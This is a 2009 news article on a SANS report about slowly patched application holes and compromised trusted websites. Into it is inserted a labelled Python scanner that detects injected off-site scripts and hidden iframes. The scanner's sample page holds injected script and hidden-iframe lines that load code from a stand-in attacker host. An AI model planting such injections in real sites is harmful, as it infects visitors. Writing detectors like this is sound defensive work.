Government Technology


Report: Application Vendors Take Too Long to Fix Dangerous Security Holes



September 24, 2009

Researchers have found that vulnerabilities in popular client-side programs and Web sites stay open at least twice as long as holes in the underlying operating systems, even though applications such as QuickTime, Flash and Microsoft Office are the ones attackers target and exploit most.

"When an operating system vulnerability comes out for Windows, it gets patched fairly quickly. But when a vulnerability comes out for Adobe Reader, for example, or for QuickTime or even for Microsoft Office, people apply these patches in a much slower rhythm," said Wolfgang Kandek, chief technical officer for Qualys, a provider of security risk and compliance technology.

The figures Kandek cites come from the Top Cyber Security Risks report released this month by the SANS Institute, an organization that provides security training and research. Researchers from Qualys and from TippingPoint, an intrusion prevention vendor, worked with SANS researchers to compile the report's data.

The data cover March through August 2009 and combine attack information from 6,000 organizations that TippingPoint monitors with intrusion prevention systems, vulnerability data from 9 million systems compiled by Qualys, and additional information from SANS personnel. SANS plans to release a cyber-security risks report every six months to keep the data current.

The data show that application vulnerabilities now outnumber operating system vulnerabilities and that attacks against Web applications made up more than 60 percent of the attacks observed on the Internet. These Web application vulnerabilities were "being exploited widely to convert trusted Web sites into malicious Web sites serving content that contains client-side exploits." The client-side programs those exploits target are themselves the report's second major concern.

"The two big places that's happening are on these trusted Web sites where people wrote the applications that support the Web site, but they left flaws in their programs that cause all of their visitors to the Web site to be infected," said Alan Paller, the director of research for SANS. "The other one is flaws in client software like Flash and Adobe Reader and Microsoft Office. Those have vulnerabilities that are not being patched."
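The report and Paller describe the outcome (a trusted site that starts serving content containing client-side exploits) but not a way to notice it. The script below is an added example, not code from the SANS report, Qualys, TippingPoint or this article. It assumes the compromised site hands visitors the exploit content through injected script, iframe, object or embed elements that reference an attacker-controlled host, and it flags any such reference to a host outside the site's own domain or an explicit allowlist, plus any iframe that is sized or styled to be invisible. The sample page, the site name www.example.gov and the host names in it are constructed for the example.

```python
"""Flag off-site active-content references in HTML a site serves.

Added example, not from the SANS report or the article. It assumes the
injected-reference pattern described in the lead-in; the sample page and
all host names below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags and the attribute through which each can pull in third-party
# active content that runs in the visitor's browser.
_REMOTE_ATTRS = {
    "script": "src",
    "iframe": "src",
    "object": "data",
    "embed": "src",
}


class InjectedContentScanner(HTMLParser):
    """Collect remote active-content references and flag suspicious ones."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        # The site's own host is always acceptable; partners must be listed.
        self.allowed = {h.lower() for h in allowed_hosts} | {self.site_host}
        self.findings = []  # (tag, reference, [reasons])

    def handle_starttag(self, tag, attrs):
        attr_name = _REMOTE_ATTRS.get(tag)
        if attr_name is None:
            return
        attrs = dict(attrs)
        ref = attrs.get(attr_name)
        if not ref:
            return
        host = urlparse(ref).hostname
        if host is None:  # relative URL: served by the site itself
            return
        reasons = []
        if host.lower() not in self.allowed:
            reasons.append("off-site host %s" % host)
        if tag == "iframe" and self._is_hidden(attrs):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append((tag, ref, reasons))

    @staticmethod
    def _is_hidden(attrs):
        """Zero/one-pixel frames or display:none are a classic drive-by marker."""
        style = (attrs.get("style") or "").replace(" ", "").lower()
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        return tiny or "display:none" in style or "visibility:hidden" in style


def scan_html(html, site_host, allowed_hosts=()):
    """Return the list of (tag, reference, reasons) findings for one page."""
    scanner = InjectedContentScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page with two injected elements appended
# after </html>, the way content injected through a back-end flaw often lands.
SAMPLE_PAGE = """<html><head>
<script src="/static/site.js"></script>
<script src="https://cdn.example-partner.net/lib.js"></script>
</head><body><h1>City services</h1></body></html>
<script src="http://evil.example/x.js"></script>
<iframe src="http://evil.example/ld.php" width="0" height="0" style="display: none"></iframe>
"""

if __name__ == "__main__":
    hits = scan_html(SAMPLE_PAGE, "www.example.gov",
                     allowed_hosts=["cdn.example-partner.net"])
    for tag, ref, reasons in hits:
        print("%-6s %-36s %s" % (tag, ref, "; ".join(reasons)))
```

Run against pages fetched from the site (or from a crawler's stored copies) and diff the findings over time; a new off-site host showing up across many pages at once is the signature of the mass compromise the report describes. Keep the allowlist short and reviewed, since a permanently allowed third-party host is exactly what an attacker would want to own.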

The report didn't examine why these vulnerabilities stay open so much longer, but Kandek said he believes IT administrators are simply more focused on patching operating systems than on patching the applications that run on them.

As for why the applications have so many holes in the first place, he theorizes that programmers are pushed to deliver functionality rather than to write secure code.

"Software in the past was developed to provide you the functions that you require. That is the focus -- does it print well, does it format well, does it allow me to do this and this," Kandek said. "The security and development -- there wasn't really a focus."

The SANS Institute hopes that this report and its future editions will help inform and educate programmers in the vendor community to focus more on security when they write their programs.
